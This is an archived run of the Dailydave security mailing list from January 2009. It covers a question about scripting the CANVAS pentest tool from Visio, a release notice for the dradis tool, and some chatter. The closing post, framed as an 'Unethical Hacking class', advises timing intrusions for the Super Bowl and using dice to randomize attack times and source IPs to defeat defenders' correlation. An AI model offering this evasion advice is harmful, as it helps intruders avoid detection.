-dave > > -----BEGIN PGP SIGNATURE----- > Version: GnuPG v1.4.6 (GNU/Linux) > Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org > > iD8DBQFJfxkAtehAhL0gheoRAovYAJ0SUGxwYx2Ar+qoPeVyvaXx7Bfg+gCfVOii > 7m/4FA8nFor060vtlPeZxnY= > =DtNJ > -----END PGP SIGNATURE----- > > _______________________________________________ > Dailydave mailing list > Dailydave at lists.immunitysec.com > http://lists.immunitysec.com/mailman/listinfo/dailydave > -------------- next part -------------- An HTML attachment was scrubbed... URL: http://lists.immunitysec.com/pipermail/dailydave/attachments/20090127/6c474d86/attachment-0001.htm From dr at kyx.net Tue Jan 27 20:18:32 2009 From: dr at kyx.net (Dragos Ruiu) Date: Tue, 27 Jan 2009 17:18:32 -0800 Subject: [Dailydave] For those: a collection In-Reply-To: <497F9534.7090607@immunityinc.com> References: <497F9534.7090607@immunityinc.com> Message-ID: <7F910286-B16E-43C3-AC5A-2543B4EC55EE@kyx.net> Re: your trip to japan. Here is a nifty bit to pack if any of your group has an iPhone. A speech recognition Japanese/English language translator software from NEC: http://www.akihabaranews.com/en/news_details.php?id=17263 Also... if you are staying in/near Shinjuku, there is some Alice-meets- gothic-lolita Alice in Wonderland themed restaurant I've been meaning to check out (despite it being in Kabukicho): http://metropolis.co.jp/tokyo/769/restaurants.asp If you go, do send me reviews :). cheers, --dr -- World Security Pros. Cutting Edge Training, Tools, and Techniques Vancouver, Canada March 16-20 2009 http://cansecwest.com London, U.K. May 27/28 2009 http://eusecwest.com pgpkey http://dragos.com/ kyxpgp From dummychuck at gmail.com Tue Jan 27 20:07:12 2009 From: dummychuck at gmail.com (Tucker Dummychuck) Date: Tue, 27 Jan 2009 17:07:12 -0800 Subject: [Dailydave] Hello Microsofties! In-Reply-To: <26f61db50901270654q18205eaemeafd04c288c97337@mail.gmail.com> References: <497F1901.2090405@immunityinc.com> <26f61db50901270654q18205eaemeafd04c288c97337@mail.gmail.com> Message-ID: <94cf67610901271707y66dd1b57yb1a73165080917c0@mail.gmail.com> I've not done this myself, but I think a good starting point would be VSTO (Visual Studio Tools for Office). See http://blogs.msdn.com/chhopkin/archive/2008/08/29/vsto-3-0-and-visio-essentials.aspx thx Tucker. On Tue, Jan 27, 2009 at 6:54 AM, Mohammad Hosein wrote: > as much as it may look embarrassing since this is a hacker forum , once i > did a fairly complex Office Add-in development using tools come from "Add-in > Express" and it saves me a lot of time , and well , money . > but basically what you need is to instantiate a dozen of Office's whacky COM > classes and call a bunch of methods . its unreasonably undocumented and hard > to debug . instead , this package gave me a couple of components and Wizards > helped me ignore the complexity and just go on with my business . > > http://www.add-in-express.com > > > On Tue, Jan 27, 2009 at 5:54 PM, Dave Aitel wrote: > >> -----BEGIN PGP SIGNED MESSAGE----- >> Hash: SHA1 >> >> So as a side project I'm doing something weirder than usual: C#. Well, >> it doesn't have to be C#. Ideally it'd be IronPython - but it's CLR >> which means the underlying language is essentially C# no matter what >> your syntax looks like. >> >> Here's where we're coming from over at Immunity. It's great to have a >> penetration testing tool. Everyone loves a nice GUI popping up shells. >> But, in fact, for some large percentage of our customers you're really >> only using that tool in order to fit it into your internal business >> processes which Immunity typically knows nothing about. While we have >> a number of people writing exploits using the CANVAS Python API, it's >> not necessarily the way everyone wants to extend CANVAS. For example, >> for unknown reasons, not everyone knows Python! >> >> So instead we have an XML-RPC API. Ideally every network attack tool >> would have the same XML-RPC API so you could talk to them all with the >> same client code, but that might be asking a lot in the short run. >> >> In the meantime, you have a ton of people using Visio with their >> network diagrams, and I want to give them a way to connect to CANVAS's >> running on those subnets and do cool things. Imagine if you could just >> right click a Visio picture and say "What OS is this really?" or "Is >> this machine patched for MS08_067?" or "Color all the MS machines on >> this network red, and the Linux ones Blue" or "Tell me which machines >> are on this network" or "Portscan these and tell me which ones are >> IIS". Really, the possibilities are endless when it comes to business >> logic automation. >> >> Essentially, a web application these days is just one instance of >> something consuming your XML-RPC API. Everyone else can build their >> own web mashups, or even thick clients based on their own business >> tools. Welcome to Web 2.0! :> >> >> Anyways, my question is: Who has done something like this with Visio? >> What do you recommend - and where is the IRC channel for quick help >> with the Visio API? :> >> >> - -dave >> >> -----BEGIN PGP SIGNATURE----- >> Version: GnuPG v1.4.6 (GNU/Linux) >> Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org >> >> iD8DBQFJfxkAtehAhL0gheoRAovYAJ0SUGxwYx2Ar+qoPeVyvaXx7Bfg+gCfVOii >> 7m/4FA8nFor060vtlPeZxnY= >> =DtNJ >> -----END PGP SIGNATURE----- >> >> _______________________________________________ >> Dailydave mailing list >> Dailydave at lists.immunitysec.com >> http://lists.immunitysec.com/mailman/listinfo/dailydave >> > > > _______________________________________________ > Dailydave mailing list > Dailydave at lists.immunitysec.com > http://lists.immunitysec.com/mailman/listinfo/dailydave > > -------------- next part -------------- An HTML attachment was scrubbed... URL: http://lists.immunitysec.com/pipermail/dailydave/attachments/20090127/54a0325c/attachment.htm From ceng at Veracode.com Wed Jan 28 01:50:42 2009 From: ceng at Veracode.com (Chris Eng) Date: Wed, 28 Jan 2009 01:50:42 -0500 Subject: [Dailydave] For those: a collection In-Reply-To: <497F9534.7090607@immunityinc.com> References: <497F9534.7090607@immunityinc.com> Message-ID: <79348E23E9D34F4F8032010B2913D72B021947B9@NexusCore.Veracode.local> > For those who like to eat at my fav Iraqi restaurant in Laurel (hey, I > remember that guy!): > http://www.cicentre.com/spycase/DELLEMY_Saubhe_Jassim_al.html Holy crap! I know we used to joke about that but I didn't think he was actually a spy. That place was good. From krahmer at suse.de Wed Jan 28 08:02:49 2009 From: krahmer at suse.de (Sebastian Krahmer) Date: Wed, 28 Jan 2009 14:02:49 +0100 Subject: [Dailydave] IPv6 NAT Message-ID: <20090128130249.GA15129@suse.de> Hi, For those who were missing NAT for IPv6 to test the latest duplicate X509 root-certificate attacks as demonstrated recently, you can find ip6nat here: http://c-skills.blogspot.com/2009/01/ipv6-nat.html Sebastian -- ~ ~ perl self.pl ~ $_='print"\$_=\47$_\47;eval"';eval ~ krahmer at suse.de - SuSE Security Team ~ SUSE LINUX Products GmbH, GF: Markus Rex, HRB 16746 (AG Nuernberg) From etd at nomejortu.com Thu Jan 29 18:19:07 2009 From: etd at nomejortu.com (etd) Date: Thu, 29 Jan 2009 23:19:07 +0000 Subject: [Dailydave] [tool] dradis v2.0 released Message-ID: <4982396B.7090803@nomejortu.com> What is dradis? --------------------------------------------------- - dradis is an open source tool for sharing information during security assessments. - It provides a centralized repository of information to keep track of what has been done so far, and what is still ahead. - Client/server architecture with a web interface Why should I care? --------------------------------------------------- - If your are in a lengthy engagement, having all the information in one place will make things easier. Everyone is in the same page. - If your team changes (i.e. someone joins half the way through), it will be useful to bring them up to speed. - It's flexible, you don't need to adapt your methodology to use it. - Is provides a web service interface so you can connect it with your existing vulnerability database or reporting tool. What does it look like? Where do I get more info.? --------------------------------------------------- - Flash demo: http://dradis.nomejortu.com/videos/dradis2-01.html - Screenshots: http://dradis.nomejortu.com/screenshots.html - Project info: http://sourceforge.net/projects/dradis http://freshmeat.net/projects/dradis http://dradis.sourceforge.net/ - More info, changelog, features: http://usefulfor.com/security/2009/01/30/dradis-v2 From dave.aitel at gmail.com Sat Jan 31 18:17:01 2009 From: dave.aitel at gmail.com (Dave Aitel) Date: Sat, 31 Jan 2009 18:17:01 -0500 Subject: [Dailydave] Sunday sunday sunday! Message-ID: If we were in Unethical Hacking class today I'd be pointing out that tomorrow night is a good time to hack, because no "American" would be hacking during the super bowl, surely! When you hack, it's always the same way on your end. You've got three major windows. The top left is your plan of action (aka, a script). The top right is output. The top middle is input (Get two screens!). The bottom is network dump (ideally colorized but tcpdump -n will do in a pinch, no?). But you never hack on a schedule. In this regards a simple pair of dice can be your most powerful weapon against both automated and manual correlation and analysis. Going active? Let the dice pick when, and from which IP's you're attacking from. Of course, if it happens to be during the Super Bowl, so much the better. It's called a Discipline for a reason. :> -dave